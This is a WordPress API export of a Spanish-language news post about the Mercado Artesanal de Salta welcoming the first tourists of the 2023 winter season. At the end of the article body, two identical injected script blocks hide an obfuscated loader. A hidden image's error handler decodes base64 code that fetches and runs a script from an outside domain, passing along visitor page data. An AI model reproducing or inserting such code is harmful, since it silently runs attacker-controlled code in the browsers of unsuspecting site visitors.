{"id":2834,"date":"2023-07-10T12:29:39","date_gmt":"2023-07-10T15:29:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2834"},"modified":"2025-08-14T00:13:10","modified_gmt":"2025-08-14T03:13:10","slug":"el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2834","title":{"rendered":"El Mercado Artesanal de Salta recibi\u00f3 a los primeros turistas de la temporada invernal"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#c9104b\"><em>Una familia oriunda de Santa Rosa provincia de La Pampa fue recibida y agasajada por artesanos, bailarines de academias de folclore y la directora de instituci\u00f3n.<\/em><\/h3>\n\n\n\n<p>Las Asociaciones de Artesanos del Mercado Artesanal de Salta, acompa\u00f1ados por su directora,&nbsp;<strong>Yanina Lenti<\/strong>, recibieron a la familia integrada por&nbsp;<strong>Ana Trueba<\/strong>&nbsp;y<strong>&nbsp;Andr\u00e9s Malsam<\/strong>&nbsp;y sus hijos&nbsp;<strong>Pedro<\/strong>&nbsp;y&nbsp;<strong>Alfonsina<\/strong>, oriundos de Santa Rosa, La Pampa, quienes se convirtieron en los primeros turistas de la temporada invernal 2023.<\/p>\n\n\n\n<p>Ana y Andr\u00e9s, se\u00f1alaron: \u201cLa verdad que nos han sorprendido, espectacular el recibimiento, muy lindo\u201d, agregaron: \u201cEl Mercado Artesanal es hermoso, m\u00e1s lindo de lo que nos imagin\u00e1bamos, vamos a recomendar que visiten Salta\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7889-el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-20230708160812.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7889-el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-20230708160812.jpeg\" alt=\"El Mercado Artesanal de Salta recibi\u00f3 a los primeros turistas de la temporada invernal\"\/><\/a><\/figure>\n\n\n\n<p>Por su parte Yanina Lenti, destac\u00f3: \u201cEstamos muy contentos de que Salta sea elegida como destino por el turismo nacional\u00bb, agreg\u00f3: \u00abVamos a continuar trabajando para promover el patrimonio aut\u00e9ntico de nuestra Provincia y reafirmar el acervo cultural, artesanal, arquitect\u00f3nico e hist\u00f3rico que mantiene la antigua casona\u00bb.&nbsp;<\/p>\n\n\n\n<p>En la explana de ingreso, artesanos, bailarines de academias de folclore y la directora de instituci\u00f3n, los recibieron e invitaron a recorrer los salones de venta y exposici\u00f3n, donde fueron obsequiados con artesan\u00edas y gastronom\u00eda regional.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7890-el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-20230708160821.jpeg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7890-el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-20230708160821.jpeg\" alt=\"El Mercado Artesanal de Salta recibi\u00f3 a los primeros turistas de la temporada invernal\" width=\"301\" height=\"201\"\/><\/a><\/figure><\/div>\n\n\n<p>Para finalizar, integrantes del Taller de Danzas y Malambo \u201cLos hijos de Fierro\u201d y la Asociaci\u00f3n de Jubilados y Pensionados de Salta delegaci\u00f3n Cerrillos \u201cBallet Flor de Nogal\u201d, deleitaron al p\u00fablico con su danza, mientras se compart\u00eda un tradicional desayuno con mate cocido y bollos.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Mercado Artesanal de Salta recibi\u00f3 a los primeros turistas de la temporada invernal\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/yz7bDXOWaJ4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mercado-artesanal-de-salta-recibio-a-los-primeros-turistas-de-la-temporada-invernal-90620\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Una familia oriunda de Santa Rosa provincia de La Pampa fue recibida y agasajada por artesanos, bailarines de academias de folclore y la directora de instituci\u00f3n. Las Asociaciones de Artesanos del Mercado Artesanal de Salta, acompa\u00f1ados por su directora,&nbsp;Yanina Lenti, recibieron a la familia integrada por&nbsp;Ana Trueba&nbsp;y&nbsp;Andr\u00e9s Malsam&nbsp;y sus hijos&nbsp;Pedro&nbsp;y&nbsp;Alfonsina, oriundos de Santa Rosa, La [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2835,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-2834","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2834"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2834"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2834\/revisions"}],"predecessor-version":[{"id":7031,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2834\/revisions\/7031"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2835"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2834"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2834"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}